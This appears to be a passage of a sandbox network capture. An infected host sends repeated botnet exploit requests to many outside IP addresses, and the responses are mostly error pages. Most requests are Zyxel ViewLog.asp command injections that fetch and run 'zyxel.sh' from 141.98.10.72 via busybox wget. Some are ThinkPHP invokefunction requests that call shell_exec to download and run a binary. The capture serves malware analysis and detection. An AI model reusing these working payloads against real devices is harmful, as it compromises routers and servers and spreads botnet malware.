Feb 14, 2024 09:30:31.512495041 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:34.392348051 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:39.768134117 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:50.519800901 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:12.023132086 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:55.030119896 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
693	192.168.2.15	57670	95.202.89.80	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.494121075 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:29.755696058 CET	36	IN	HTTP/1.1 403 Forbidden

Session ID	Source IP	Source Port	Destination IP	Destination Port
694	192.168.2.15	44238	94.123.180.208	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.566042900 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
695	192.168.2.15	42722	31.40.225.47	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.568970919 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:29.821563005 CET	1286	IN	HTTP/1.0 400 Bad Request Server: squid/3.1.23 Mime-Version: 1.0 Date: Wed, 14 Feb 2024 08:00:25 GMT Content-Type: text/html Content-Length: 3167 X-Squid-Error: ERR_INVALID_URL 0 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area /#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/ initial title /#titles h1 {color: #000000;}#titles h2 {color: #000000;}/ special event: FTP success page titles /#titles ftpsuccess {background-color:#00ff00;width:100%;}/ Page displayed body content area */#content {padding: 10px;background: #ffffff

Session ID	Source IP	Source Port	Destination IP	Destination Port
696	192.168.2.15	53844	95.131.78.169	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.571894884 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:29.827936888 CET	363	IN	HTTP/1.1 403 Forbidden Server: Web server Date: Wed, 14 Feb 2024 08:30:28 GMT Content-Type: text/html Content-Length: 151 Connection: keep-alive X-Detail: 0x1210, insufficient security level Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
697	192.168.2.15	60588	112.121.179.134	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.619568110 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:29.935121059 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:46 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
698	192.168.2.15	51650	119.29.120.222	23

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.742831945 CET	171	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 31 3a 30 30 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:31:00Auth Result: ????.

Session ID	Source IP	Source Port	Destination IP	Destination Port
699	192.168.2.15	36432	95.216.6.26	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.841356993 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:30.063098907 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
700	192.168.2.15	39662	95.86.112.120	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:29.871938944 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
701	192.168.2.15	47580	95.216.249.161	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.079786062 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:31.224405050 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:32.568382025 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:35.416246891 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:40.792109013 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:51.543768883 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:14.071485043 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:57.077977896 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
702	192.168.2.15	45084	85.215.221.133	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:30.079849958 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:34.136495113 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:34.389202118 CET	575	IN	HTTP/1.1 404 Not Found Cache-Control: must-revalidate,no-cache,no-store Content-Type: text/html;charset=iso-8859-1 Content-Length: 382 Connection: close Server: Jetty(9.4.45.v20220203) Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 2f 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 32 3e 48 54 54 50 20 45 52 52 4f 52 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 3c 74 61 62 6c 65 3e 0a 3c 74 72 3e 3c 74 68 3e 55 52 49 3a 3c 2f 74 68 3e 3c 74 64 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 54 41 54 55 53 3a 3c 2f 74 68 3e 3c 74 64 3e 34 30 34 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 4d 45 53 53 41 47 45 3a 3c 2f 74 68 3e 3c 74 64 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 68 3e 53 45 52 56 4c 45 54 3a 3c 2f 74 68 3e 3c 74 64 3e 64 65 66 61 75 6c 74 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 2f 74 61 62 6c 65 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="text/html;charset=ISO-8859-1"/><title>Error 404 Not Found</title></head><body><h2>HTTP 